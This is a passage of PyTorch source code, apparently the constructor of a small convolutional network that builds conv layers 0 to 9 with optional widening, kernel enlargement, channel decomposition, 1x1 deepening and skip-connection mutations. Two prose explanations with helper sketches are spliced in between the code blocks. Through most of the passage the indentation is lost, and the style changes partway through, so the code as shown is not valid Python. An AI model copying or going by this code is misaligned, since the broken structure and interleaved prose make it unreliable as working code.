params[3] = params[3] + 2* int(self.kerneladd_list[0])
params[6] = params[6] + int(self.kerneladd_list[0])
params[7] = params[7] + int(self.kerneladd_list[0])
        if self.decompo_list is not None:
if self.decompo_list[0] == 1:
self.conv0_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[0] == 2:
self.conv0_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv0 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv0 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[0] == 1:
self.conv0_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[0] == 1:
self.conv0_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn0 = torch.nn.BatchNorm2d(params[1])
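The `decompo_list` branches above and below split one convolution into parallel halves or quarters. Reading the constructor shapes, codes 1/2 appear to split the output channels (branch outputs presumably concatenated in the forward pass, which is not shown here), while codes 3/4 split the input channels; conv0 only supports 1/2 because its 3-channel input is not divisible. A sketch of just that channel bookkeeping, under that assumed reading of the codes:

```python
def decompo_channels(in_ch, out_ch, code):
    """(in, out) channel pairs for each parallel branch under the
    assumed decompo semantics: 1/2 split outputs, 3/4 split inputs."""
    if code == 1:
        return [(in_ch, out_ch // 2)] * 2
    if code == 2:
        return [(in_ch, out_ch // 4)] * 4
    if code == 3:
        return [(in_ch // 2, out_ch)] * 2
    if code == 4:
        return [(in_ch // 4, out_ch)] * 4
    return [(in_ch, out_ch)]  # code 0: leave the layer intact
```

For code 2 on a 16-to-16 conv this yields four 16-to-4 branches, matching the four `Conv2d(params[0], int(params[1]/4), ...)` constructions.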
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[0] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[0] / 4) * 4)
if self.widen_list[1] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[1] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[1] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[1])
params[3] = params[3] + 2* int(self.kerneladd_list[1])
params[6] = params[6] + int(self.kerneladd_list[1])
params[7] = params[7] + int(self.kerneladd_list[1])
        if self.decompo_list is not None:
if self.decompo_list[1] == 1:
self.conv1_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 2:
self.conv1_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 3:
self.conv1_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 4:
self.conv1_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv1 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv1 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[1] == 1:
self.conv1_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[1] == 1:
self.conv1_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn1 = torch.nn.BatchNorm2d(params[1])
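The `kerneladd_list` adjustments enlarge a kernel by 2·d in each spatial dimension while bumping the padding by d. That keeps the convolution's output size unchanged, which the standard output-size formula makes explicit (sketched here for stride 1):

```python
def conv_out_size(n, kernel, padding, stride=1):
    # Standard convolution output-size formula:
    # floor((n + 2*p - k) / s) + 1
    return (n + 2 * padding - kernel) // stride + 1

# Adding d to the padding while adding 2*d to the kernel cancels out:
# n + 2*(p + d) - (k + 2*d) == n + 2*p - k
```

So a 3x3/pad-1 layer grown to 5x5/pad-2 or 7x7/pad-3 still maps a 32x32 feature map to 32x32.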
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[1] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[1] / 4) * 4)
if self.widen_list[2] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[2] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[2] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[2])
params[3] = params[3] + 2* int(self.kerneladd_list[2])
params[6] = params[6] + int(self.kerneladd_list[2])
params[7] = params[7] + int(self.kerneladd_list[2])
        if self.decompo_list is not None:
if self.decompo_list[2] == 1:
self.conv2_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 2:
self.conv2_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 3:
self.conv2_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 4:
self.conv2_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv2 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv2 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[2] == 1:
self.conv2_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[2] == 1:
self.conv2_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn2 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[2] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[2] / 4) * 4)
if self.widen_list[3] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[3] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[3] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[3])
params[3] = params[3] + 2* int(self.kerneladd_list[3])
params[6] = params[6] + int(self.kerneladd_list[3])
params[7] = params[7] + int(self.kerneladd_list[3])
        if self.decompo_list is not None:
if self.decompo_list[3] == 1:
self.conv3_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 2:
self.conv3_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 3:
self.conv3_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 4:
self.conv3_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv3 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv3 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[3] == 1:
self.conv3_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[3] == 1:
self.conv3_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn3 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[3] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[3] / 4) * 4)
if self.widen_list[4] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[4] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[4] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[4])
params[3] = params[3] + 2* int(self.kerneladd_list[4])
params[6] = params[6] + int(self.kerneladd_list[4])
params[7] = params[7] + int(self.kerneladd_list[4])
        if self.decompo_list is not None:
if self.decompo_list[4] == 1:
self.conv4_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 2:
self.conv4_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 3:
self.conv4_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 4:
self.conv4_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv4 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv4 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[4] == 1:
self.conv4_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[4] == 1:
self.conv4_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn4 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[4] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[4] / 4) * 4)
if self.widen_list[5] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[5] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[5] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[5])
params[3] = params[3] + 2* int(self.kerneladd_list[5])
params[6] = params[6] + int(self.kerneladd_list[5])
params[7] = params[7] + int(self.kerneladd_list[5])
        if self.decompo_list is not None:
if self.decompo_list[5] == 1:
self.conv5_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 2:
self.conv5_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 3:
self.conv5_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 4:
self.conv5_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv5 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv5 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[5] == 1:
self.conv5_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[5] == 1:
self.conv5_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn5 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[5] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[5] / 4) * 4)
if self.widen_list[6] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[6] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[6] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[6])
params[3] = params[3] + 2* int(self.kerneladd_list[6])
params[6] = params[6] + int(self.kerneladd_list[6])
params[7] = params[7] + int(self.kerneladd_list[6])
        if self.decompo_list is not None:
if self.decompo_list[6] == 1:
self.conv6_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 2:
self.conv6_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 3:
self.conv6_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 4:
self.conv6_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv6 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv6 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
if self.deepen_list[6] == 1:
self.conv6_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
if self.skipcon_list[6] == 1:
self.conv6_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn6 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[6] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[6] / 4) * 4)
if self.widen_list[7] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[7] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[7] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[7])
params[3] = params[3] + 2* int(self.kerneladd_list[7])
params[6] = params[6] + int(self.kerneladd_list[7])
params[7] = params[7] + int(self.kerneladd_list[7])
if self.decompo_list != None:
if self.decompo_list[7] == 1:
self.conv7_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 2:
self.conv7_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 3:
self.conv7_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 4:
self.conv7_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv7 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv7 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[7] == 1:
self.conv7_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[7] == 1:
self.conv7_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn7 = torch.nn.BatchNorm2d(params[1])
        # conv8: 16 -> 16 channels, 3x3 kernel, stride 1
        params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[7] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[7] / 4) * 4)
            if self.widen_list[8] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[8] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[8] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[8])
                params[3] = params[3] + 2 * int(self.kerneladd_list[8])
                params[6] = params[6] + int(self.kerneladd_list[8])
                params[7] = params[7] + int(self.kerneladd_list[8])
        if self.decompo_list is not None:
            if self.decompo_list[8] == 1:
                self.conv8_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[8] == 2:
                self.conv8_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[8] == 3:
                self.conv8_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[8] == 4:
                self.conv8_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv8_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv8 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv8 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[8] == 1:
                self.conv8_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[8] == 1:
                self.conv8_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn8 = torch.nn.BatchNorm2d(params[1])
        # conv9: 16 -> 16 channels, 3x3 kernel, stride 1
        params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[8] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[8] / 4) * 4)
            if self.widen_list[9] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[9] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[9] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[9])
                params[3] = params[3] + 2 * int(self.kerneladd_list[9])
                params[6] = params[6] + int(self.kerneladd_list[9])
                params[7] = params[7] + int(self.kerneladd_list[9])
        if self.decompo_list is not None:
            if self.decompo_list[9] == 1:
                self.conv9_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[9] == 2:
                self.conv9_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
